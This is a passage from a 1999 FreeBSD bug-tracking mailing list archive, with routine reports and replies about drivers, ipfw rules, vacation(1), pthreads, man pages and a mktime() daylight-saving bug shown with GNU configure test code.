-0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA80254; Wed, 15 Dec 1999 17:56:21 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Wed, 15 Dec 1999 17:56:21 -0800 (PST) From: Message-Id: <199912160156.RAA80254@freefall.freebsd.org> To: billf@FreeBSD.org, freebsd-bugs@FreeBSD.org, wpaul@FreeBSD.org Subject: Re: kern/10673: Non-ASCII chars on serial console with RealTek 8139 at 100M FD. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Non-ASCII chars on serial console with RealTek 8139 at 100M FD. Responsible-Changed-From-To: freebsd-bugs->wpaul Responsible-Changed-By: billf Responsible-Changed-When: Wed Dec 15 17:55:48 PST 1999 Responsible-Changed-Why: Mr. Paul's driver. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 19:41:32 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from sapphire.alisa.org (i-legal.com [209.181.77.105]) by hub.freebsd.org (Postfix) with ESMTP id 629BA14EA7 for ; Wed, 15 Dec 1999 19:41:30 -0800 (PST) (envelope-from jjr@sapphire.alisa.org) Received: (from jjr@localhost) by sapphire.alisa.org (8.9.3/8.9.3) id UAA22574 for freebsd-bugs@freebsd.org; Wed, 15 Dec 1999 20:41:29 -0700 (MST) (envelope-from jjr) Date: Wed, 15 Dec 1999 20:41:29 -0700 (MST) From: "John J. Rushford Jr." Message-Id: <199912160341.UAA22574@sapphire.alisa.org> To: freebsd-bugs@freebsd.org Subject: smp and cy driver Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From jjr@sapphire.alisa.org Wed Dec 15 20:06:59 1999 Path: news.uswest.net!news-out.uswest.net!news.uswest.net.POSTED!not-for-mail From: "John J. Rushford Jr." Subject: FYI, smp and cy driver Newsgroups: comp.unix.bsd.freebsd.misc User-Agent: tin/pre-1.4-19990413 ("Endemoniada") (UNIX) (FreeBSD/3.2-RELEASE (i386)) Lines: 17 Message-ID: <%vY54.531$d4.41377@news.uswest.net> Date: Thu, 16 Dec 1999 02:54:51 GMT NNTP-Posting-Host: 209.181.77.105 X-Trace: news.uswest.net 945312891 209.181.77.105 (Wed, 15 Dec 1999 20:54:51 CST) NNTP-Posting-Date: Wed, 15 Dec 1999 20:54:51 CST Xref: news-out.uswest.net comp.unix.bsd.freebsd.misc:29737 Just thought I'd mention this. I've just recently installed a Cyclades YeP multiports card on a FreeBSD 3.2 system with an SMP kernel, Dual PII's. Anyway, the kernel panics with the external ports box plugged into the PCI card and with the cy driver enabled. I finally found that if I re-compile the kernel without SMP support, that the YeP card and cy driver are fully functional. regards -- John J. Rushford jjr@sapphire.alisa.org jjr@cs.du.edu http://www.cs.du.edu/~jjr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 21:26:38 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from kot.ne.mediaone.net (kot.ne.mediaone.net [24.218.15.190]) by hub.freebsd.org (Postfix) with ESMTP id 23340152E3; Wed, 15 Dec 1999 21:26:35 -0800 (PST) (envelope-from mi@kot.ne.mediaone.net) Received: from rtfm.newton (rtfm.newton [10.10.0.1]) by kot.ne.mediaone.net (8.9.3/8.9.1) with ESMTP id AAA67917; Thu, 16 Dec 1999 00:26:23 -0500 (EST) From: Mikhail Teterin X-Relay-IP: 10.10.0.1 Received: (from mi@localhost) by rtfm.newton (8.9.3/8.9.3) id AAA33510; Thu, 16 Dec 1999 00:26:22 -0500 (EST) (envelope-from mi@kot.ne.mediaone.net) Message-Id: <199912160526.AAA33510@rtfm.newton> Subject: Re: bin/15227: New option for vacation(1) -- dir to use instead of $HOME In-Reply-To: <19991204124223.A3330@daemon.ninth-circle.org> from Jeroen Ruigrok/Asmodai at "Dec 4, 1999 12:42:23 pm" To: Jeroen Ruigrok/Asmodai Date: Thu, 16 Dec 1999 00:26:22 -0500 (EST) Cc: gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org X-Face: %UW#n0|w>ydeGt/b@1-.UFP=K^~-:0f#O:D7w hJ5G_<5143Bb3kOIs9XpX+"V+~$adGP:J|SLieM31VIhqXeLBli"; Wed, 15 Dec 1999 21:39:11 -0800 (PST) (envelope-from marcs@znep.com) Received: from localhost (marcs@localhost) by alive.znep.com (8.9.3/8.9.1) with ESMTP id WAA97871; Wed, 15 Dec 1999 22:38:52 -0700 (MST) (envelope-from marcs@znep.com) Date: Wed, 15 Dec 1999 22:38:52 -0700 (MST) From: Marc Slemko To: Mikhail Teterin Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: bin/15227: New option for vacation(1) -- dir to use instead of $HOME In-Reply-To: <199912040039.TAA27558@misha.cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 3 Dec 1999, Mikhail Teterin wrote: > * uses From and Reply-To headers if any -- the fact > that our old vacation is NOT doing this, should've > been send-pr-ed long time ago Erm... huh? You don't honestly think that vacation should use Reply-To: headers and From: headers do you? That would be lunacy, and just the trigger for all sorts of annoying behaviour. It uses the envelope sender on purpose... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 21:53: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id 7B84814EEB; Wed, 15 Dec 1999 21:53:01 -0800 (PST) To: jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG, jasone@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: kern/15440 Message-Id: <19991216055301.7B84814EEB@hub.freebsd.org> Date: Wed, 15 Dec 1999 21:53:01 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: support atomic locks in the UP kernel Responsible-Changed-From-To: freebsd-bugs->jasone Responsible-Changed-By: jasone Responsible-Changed-When: Wed Dec 15 21:51:14 PST 1999 Responsible-Changed-Why: The originator of the PR asked me to address the PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 22: 5:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from smtp03.wxs.nl (smtp03.wxs.nl [195.121.6.37]) by hub.freebsd.org (Postfix) with ESMTP id 48C6814C58; Wed, 15 Dec 1999 22:05:48 -0800 (PST) (envelope-from asmodai@wxs.nl) Received: from daemon.ninth-circle.org ([195.121.198.235]) by smtp03.wxs.nl (Netscape Messaging Server 3.61) with ESMTP id AAA693C; Thu, 16 Dec 1999 07:05:46 +0100 Received: (from asmodai@localhost) by daemon.ninth-circle.org (8.9.3/8.9.3) id HAA12783; Thu, 16 Dec 1999 07:05:40 +0100 (CET) (envelope-from asmodai) Date: Thu, 16 Dec 1999 07:05:40 +0100 From: Jeroen Ruigrok/Asmodai To: Mikhail Teterin Cc: gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/15227: New option for vacation(1) -- dir to use instead of $HOME Message-ID: <19991216070540.B12458@daemon.ninth-circle.org> References: <19991204124223.A3330@daemon.ninth-circle.org> <199912160526.AAA33510@rtfm.newton> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <199912160526.AAA33510@rtfm.newton>; from mi@kot.ne.mediaone.net on Thu, Dec 16, 1999 at 12:26:22AM -0500 Organisation: Ninth-Circle Enterprises Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -On [19991216 06:59], Mikhail Teterin (mi@kot.ne.mediaone.net) wrote: >Jeroen Ruigrok/Asmodai once stated: > >=Would you care to look at www.sendmail.org and see if the vacation >=program they are including now has this feature and if not also submit >=it up for review with them? > >Although Eric does seem to be the original author of vacation, I can not >find vacation being offered anywhere on sendmail.org. It is not a part >of the sendmail tar-ball either: Sorry, I was talking about the new beta (8.10.x) which does have this. Reason I say this is that of course, as long as sysinstall doesn't support MTA selection, we are going to have sendmail in the base system. -- Jeroen Ruigrok van der Werven/Asmodai asmodai@[wxs.nl|bart.nl] Documentation nutter. *BSD: Technical excellence at its best... The BSD Programmer's Documentation Project Atone me to my throes curtail... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 22:17:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id 58E0D15495; Wed, 15 Dec 1999 22:17:09 -0800 (PST) To: jau@iki.fi, jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: bin/7587 Message-Id: <19991216061709.58E0D15495@hub.freebsd.org> Date: Wed, 15 Dec 1999 22:17:09 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: There is no pthread_cancel() in libc_r.a!!! State-Changed-From-To: open->closed State-Changed-By: jasone State-Changed-When: Wed Dec 15 22:13:53 PST 1999 State-Changed-Why: Resolved. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 22:38:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id 2293A14D71; Wed, 15 Dec 1999 22:38:13 -0800 (PST) To: jin@iss-p1.lbl.gov, jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: kern/11984 Message-Id: <19991216063813.2293A14D71@hub.freebsd.org> Date: Wed, 15 Dec 1999 22:38:13 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: pthread_kill cannot kill select() threads, etc. State-Changed-From-To: feedback->closed State-Changed-By: jasone State-Changed-When: Wed Dec 15 22:27:42 PST 1999 State-Changed-Why: Resolved. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 22:44:30 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id 6124C14DD5; Wed, 15 Dec 1999 22:44:29 -0800 (PST) To: mark@tgsoft.com, jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: bin/13008 Message-Id: <19991216064429.6124C14DD5@hub.freebsd.org> Date: Wed, 15 Dec 1999 22:44:29 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: pthread_kill does not always work State-Changed-From-To: open->closed State-Changed-By: jasone State-Changed-When: Wed Dec 15 22:42:42 PST 1999 State-Changed-Why: Resolved. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 1:10: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7544914F0C for ; Thu, 16 Dec 1999 01:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA16322; Thu, 16 Dec 1999 01:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 01:10:02 -0800 (PST) Message-Id: <199912160910.BAA16322@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Alexey Zelkin Subject: Re: conf/15150: French manpages without accents with FBSD man Reply-To: Alexey Zelkin Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR conf/15150; it has been noted by GNATS. From: Alexey Zelkin To: jaco@titine.fr.eu.org Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: conf/15150: French manpages without accents with FBSD man Date: Thu, 16 Dec 1999 09:50:03 +0300 hi, On Sun, Nov 28, 1999 at 11:12:03PM +0100, jaco@titine.fr.eu.org wrote: > >Number: 15150 > >Category: conf > >Description: > > I'm translating manpages in french for the french docproj. The > translated manpage contains accents, but man refuse to take them into > account. > > >How-To-Repeat: > > Try to use man with a manpage with accents... see how they disappear. > > >Fix: > > I've noticed that the problem resides in the > /usr/src/gnu/usr.bin/man/Makefile.inc file : the call to groff is hard coded > with the -Tascii option (same for neqn). I suspect that is the same with some > other programs... [..] Andrey localized it at the middle of June. Almost all of man-related programs localized now (in 4.0-CURRENT and awaiting MFC). Please take a look there (commit logs by ache at June/Jul). His solution is much more elegant than proposed by you. -- /* Alexey Zelkin && phantom@cris.net */ /* Tavric National University && phantom@crimea.edu */ /* http://www.ccssu.crimea.ua/~phantom && phantom@FreeBSD.org */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 2:40: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B6C8155BB for ; Thu, 16 Dec 1999 02:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA23676; Thu, 16 Dec 1999 02:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 0081514D0A; Thu, 16 Dec 1999 02:37:10 -0800 (PST) Message-Id: <19991216103710.0081514D0A@hub.freebsd.org> Date: Thu, 16 Dec 1999 02:37:10 -0800 (PST) From: johan@link-data.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/15513: kernel or ipfw drops rules sometimes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15513 >Category: kern >Synopsis: kernel or ipfw drops rules sometimes >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 02:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Johan Lindh >Release: 3.3-RELEASE >Organization: Link Data Stockholm >Environment: FreeBSD firewall.pcexpress.se 3.3-RELEASE FreeBSD 3.3-RELEASE #1: Wed Dec 15 12:56:28 CET 1999 joli@firewall.pcexpress.se:/usr/src/sys/compile/FIREWALL i386 >Description: When generating the firewall ruleset using a script (say, fireup.sh), and calling another script from that one, (say, fire-www.sh), the rules that the second script creates gets dropped somehow. They're initially in the firewall, but after the "periodic daily" scripts get run they are not. >How-To-Repeat: Create a fireup.sh firewall script that calls another firewall script using "./fireup-2.sh" (or whatever you called the second). Call fireup.sh from "/etc/rc.conf.local". Let the system run across 01:59:00. >Fix: It probably fixes the problem if you put all the rules in one file, or if you use an absolute path to the second firewall script. You could probably also fix it by killing the periodic/daily scripts. The correct way is of course to fix the periodic/daily scripts. Why are they messing with the firewall at all? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 5:59:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from kot.ne.mediaone.net (kot.ne.mediaone.net [24.218.15.190]) by hub.freebsd.org (Postfix) with ESMTP id 5C89C1505A for ; Thu, 16 Dec 1999 05:59:26 -0800 (PST) (envelope-from mi@kot.ne.mediaone.net) Received: from rtfm.newton (rtfm.newton [10.10.0.1]) by kot.ne.mediaone.net (8.9.3/8.9.1) with ESMTP id IAA70975; Thu, 16 Dec 1999 08:59:23 -0500 (EST) From: Mikhail Teterin X-Relay-IP: 10.10.0.1 Received: (from mi@localhost) by rtfm.newton (8.9.3/8.9.3) id IAA34239; Thu, 16 Dec 1999 08:59:23 -0500 (EST) (envelope-from mi@kot.ne.mediaone.net) Message-Id: <199912161359.IAA34239@rtfm.newton> Subject: Re: bin/15227: New option for vacation(1) -- dir to use instead of $HOME In-Reply-To: from Marc Slemko at "Dec 15, 1999 10:38:52 pm" To: Marc Slemko Date: Thu, 16 Dec 1999 08:59:23 -0500 (EST) Cc: freebsd-bugs@FreeBSD.ORG X-Face: %UW#n0|w>ydeGt/b@1-.UFP=K^~-:0f#O:D7w hJ5G_<5143Bb3kOIs9XpX+"V+~$adGP:J|SLieM31VIhqXeLBli"; Thu, 16 Dec 1999 06:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA98518; Thu, 16 Dec 1999 06:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id C1F2F14E17; Thu, 16 Dec 1999 06:41:11 -0800 (PST) Message-Id: <19991216144111.C1F2F14E17@hub.freebsd.org> Date: Thu, 16 Dec 1999 06:41:11 -0800 (PST) From: matheny@cs.purdue.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15515: Firewall/FIltering Problems Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15515 >Category: misc >Synopsis: Firewall/FIltering Problems >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 06:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Blake Matheny >Release: 3.3 i386 >Organization: Purdue University >Environment: FreeBSD newfirewall.sdatebooks.com 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Oct 7 13:37:40 EST 1999 root@sdatebooks.com:/usr/src/sys/compile/FIREWALL i386 >Description: On a freebsd 3.3 firewall the ipfw rule is set to open. However, ports 137-139 appear as filtered when a portscan is done. We have checked with the DSL provider and the DSL modem manufacturer to see if the modem has filtering capabilities or the service provider filters and the answer to these questions was no. Question: Why would the ports come back with filtered if were not using a tcp wrapper and the firewall type is open? >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 12:10: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5E63315140 for ; Thu, 16 Dec 1999 12:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA30656; Thu, 16 Dec 1999 12:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from thoth.mch.sni.de (thoth.mch.sni.de [192.35.17.2]) by hub.freebsd.org (Postfix) with ESMTP id 4019B150EB for ; Thu, 16 Dec 1999 12:03:13 -0800 (PST) (envelope-from andre.albsmeier@mchp.siemens.de) Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14]) by thoth.mch.sni.de (8.9.3/8.9.3) with ESMTP id VAA14625 for ; Thu, 16 Dec 1999 21:03:12 +0100 (MET) Received: from curry.mchp.siemens.de (curry.mchp.siemens.de [139.25.42.7]) by mail1.siemens.de (8.9.3/8.9.3) with ESMTP id VAA01419 for ; Thu, 16 Dec 1999 21:03:11 +0100 (MET) Received: (from daemon@localhost) by curry.mchp.siemens.de (8.9.3/8.9.3) id VAA00504 for ; Thu, 16 Dec 1999 21:03:11 +0100 (CET) Message-Id: <199912162003.VAA94727@internal> Date: Thu, 16 Dec 1999 21:03:11 +0100 (CET) From: Andre Albsmeier To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/15519: Lots of bind-8.2.2 manual pages don't get installed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15519 >Category: misc >Synopsis: Lots of bind-8.2.2 manual pages don't get installed >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 12:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andre Albsmeier >Release: FreeBSD 3.4-RC i386 >Organization: >Environment: Recent FreeBSD-3.4-RC with bind 8.2.2 >Description: In contrib/bind/doc/man are several manual pages that don't get installed. These are: getaddrinfo.3 getipnodebyname.3 getnameinfo.3 hesiod.3 inet_cidr.3 irs.conf.5 named-bootconf.8 named.conf.5 nsupdate.8 tsig.3 I don't know if all of these are worth installing but named-bootconf.8 and named.conf.5 might be useful. >How-To-Repeat: man named.conf >Fix: Install missing manual pages. Maybe they should be added to usr.sbin/named/Makefile. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 12:20: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F30761513C for ; Thu, 16 Dec 1999 12:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA31471; Thu, 16 Dec 1999 12:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from david.siemens.de (david.siemens.de [192.35.17.14]) by hub.freebsd.org (Postfix) with ESMTP id 751261512C for ; Thu, 16 Dec 1999 12:16:29 -0800 (PST) (envelope-from andre.albsmeier@mchp.siemens.de) Received: from mail2.siemens.de (mail2.siemens.de [139.25.208.11]) by david.siemens.de (8.9.3/8.9.3) with ESMTP id VAA03055 for ; Thu, 16 Dec 1999 21:16:23 +0100 (MET) Received: from curry.mchp.siemens.de (curry.mchp.siemens.de [139.25.42.7]) by mail2.siemens.de (8.9.3/8.9.3) with ESMTP id VAA24082 for ; Thu, 16 Dec 1999 21:16:23 +0100 (MET) Received: (from daemon@localhost) by curry.mchp.siemens.de (8.9.3/8.9.3) id VAA00593 for ; Thu, 16 Dec 1999 21:16:23 +0100 (CET) Message-Id: <199912162016.VAA97593@internal> Date: Thu, 16 Dec 1999 21:16:20 +0100 (CET) From: Andre Albsmeier To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15520: mktime() fails under certain conditions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15520 >Category: bin >Synopsis: mktime() fails under certain conditions >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 12:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andre Albsmeier >Release: FreeBSD 3.4-RC i386 >Organization: >Environment: FreeBSD-3.4 >Description: mktime() fails if it is called with a time that is exactly the moment when daylight saving time is starting. The configure program of certain gnu software tests mktime() for the failure described above. This fails on FreeBSD and so configure assumes there is no working mktime available. This behaviour was observed when configure'ing gnu tar-1.1.3. >How-To-Repeat: The following program is the testing code of gnu's configure plus three printf's to show the returned value and if the problem exists. I have tried it also on HP-UX 10.20 and on IRIX 5.3 where it works. In this cases the result returned by mktime() is 891766800. #include #include #include void main () { time_t t; struct tm tm; /* Use the portable POSIX.1 specification "TZ=PST8PDT,M4.1.0,M10.5.0" instead of "TZ=America/Vancouver" in order to detect the bug even on systems that don't support the Olson extension, or don't have the full zoneinfo tables installed. */ putenv ("TZ=PST8PDT,M4.1.0,M10.5.0"); tm.tm_year = 98; tm.tm_mon = 3; tm.tm_mday = 5; tm.tm_hour = 2; tm.tm_min = 0; tm.tm_sec = 0; tm.tm_isdst = -1; t=mktime(&tm); printf("%lu, ", t); if (t== (time_t)-1) { printf("Error\n"); exit (1); } printf("OK\n"); } For better understanding, here is the complete conftest.c that is used by configure: #line 4392 "configure" #include "confdefs.h" /* Test program from Paul Eggert (eggert@twinsun.com) and Tony Leneis (tony@plaza.ds.adp.com). */ #if TIME_WITH_SYS_TIME # include # include #else # if HAVE_SYS_TIME_H # include # else # include # endif #endif #if HAVE_UNISTD_H # include #endif #if !HAVE_ALARM # define alarm(X) /* empty */ #endif /* Work around redefinition to rpl_putenv by other config tests. */ #undef putenv static time_t time_t_max; /* Values we'll use to set the TZ environment variable. */ static const char *const tz_strings[] = { (const char *) 0, "TZ=GMT0", "TZ=JST-9", "TZ=EST+3EDT+2,M10.1.0/00:00:00,M2.3.0/00:00:00" }; #define N_STRINGS (sizeof (tz_strings) / sizeof (tz_strings[0])) /* Fail if mktime fails to convert a date in the spring-forward gap. Based on a problem report from Andreas Jaeger. */ static void spring_forward_gap () { /* glibc (up to about 1998-10-07) failed this test) */ struct tm tm; /* Use the portable POSIX.1 specification "TZ=PST8PDT,M4.1.0,M10.5.0" instead of "TZ=America/Vancouver" in order to detect the bug even on systems that don't support the Olson extension, or don't have the full zoneinfo tables installed. */ putenv ("TZ=PST8PDT,M4.1.0,M10.5.0"); tm.tm_year = 98; tm.tm_mon = 3; tm.tm_mday = 5; tm.tm_hour = 2; tm.tm_min = 0; tm.tm_sec = 0; tm.tm_isdst = -1; if (mktime (&tm) == (time_t)-1) exit (1); } static void mktime_test (now) time_t now; { struct tm *lt; if ((lt = localtime (&now)) && mktime (lt) != now) exit (1); now = time_t_max - now; if ((lt = localtime (&now)) && mktime (lt) != now) exit (1); } static void irix_6_4_bug () { /* Based on code from Ariel Faigon. */ struct tm tm; tm.tm_year = 96; tm.tm_mon = 3; tm.tm_mday = 0; tm.tm_hour = 0; tm.tm_min = 0; tm.tm_sec = 0; tm.tm_isdst = -1; mktime (&tm); if (tm.tm_mon != 2 || tm.tm_mday != 31) exit (1); } static void bigtime_test (j) int j; { struct tm tm; time_t now; tm.tm_year = tm.tm_mon = tm.tm_mday = tm.tm_hour = tm.tm_min = tm.tm_sec = j; now = mktime (&tm); if (now != (time_t) -1) { struct tm *lt = localtime (&now); if (! (lt && lt->tm_year == tm.tm_year && lt->tm_mon == tm.tm_mon && lt->tm_mday == tm.tm_mday && lt->tm_hour == tm.tm_hour && lt->tm_min == tm.tm_min && lt->tm_sec == tm.tm_sec && lt->tm_yday == tm.tm_yday && lt->tm_wday == tm.tm_wday && ((lt->tm_isdst < 0 ? -1 : 0 < lt->tm_isdst) == (tm.tm_isdst < 0 ? -1 : 0 < tm.tm_isdst)))) exit (1); } } int main () { time_t t, delta; int i, j; /* This test makes some buggy mktime implementations loop. Give up after 60 seconds; a mktime slower than that isn't worth using anyway. */ alarm (60); for (time_t_max = 1; 0 < time_t_max; time_t_max *= 2) continue; time_t_max--; delta = time_t_max / 997; /* a suitable prime number */ for (i = 0; i < N_STRINGS; i++) { if (tz_strings[i]) putenv (tz_strings[i]); for (t = 0; t <= time_t_max - delta; t += delta) mktime_test (t); mktime_test ((time_t) 60 * 60); mktime_test ((time_t) 60 * 60 * 24); for (j = 1; 0 < j; j *= 2) bigtime_test (j); bigtime_test (j - 1); } irix_6_4_bug (); spring_forward_gap (); exit (0); } >Fix: Unknown, unfortunatley... >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 12:30: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6A28414F6B for ; Thu, 16 Dec 1999 12:30:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA32220; Thu, 16 Dec 1999 12:30:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 12:30:05 -0800 (PST) Message-Id: <199912162030.MAA32220@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andre Albsmeier Subject: Re: bin/12496: yppush broken when pushing to 2 or more slaves Reply-To: Andre Albsmeier Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/12496; it has been noted by GNATS. From: Andre Albsmeier To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: bin/12496: yppush broken when pushing to 2 or more slaves Date: Thu, 16 Dec 1999 21:22:11 +0100 I think, this PR can be closed. I have nevermore seen the problem for a long time. I had some private email exchange with John Polstra about it a while ago and we never found a reason for the errorneous behaviour but maybe it has been fixed without knowing it. If the problem appears again, we probably can open it again. -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 12:30:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A467A14F6B for ; Thu, 16 Dec 1999 12:30:07 -0800 (PST) (envelope-from 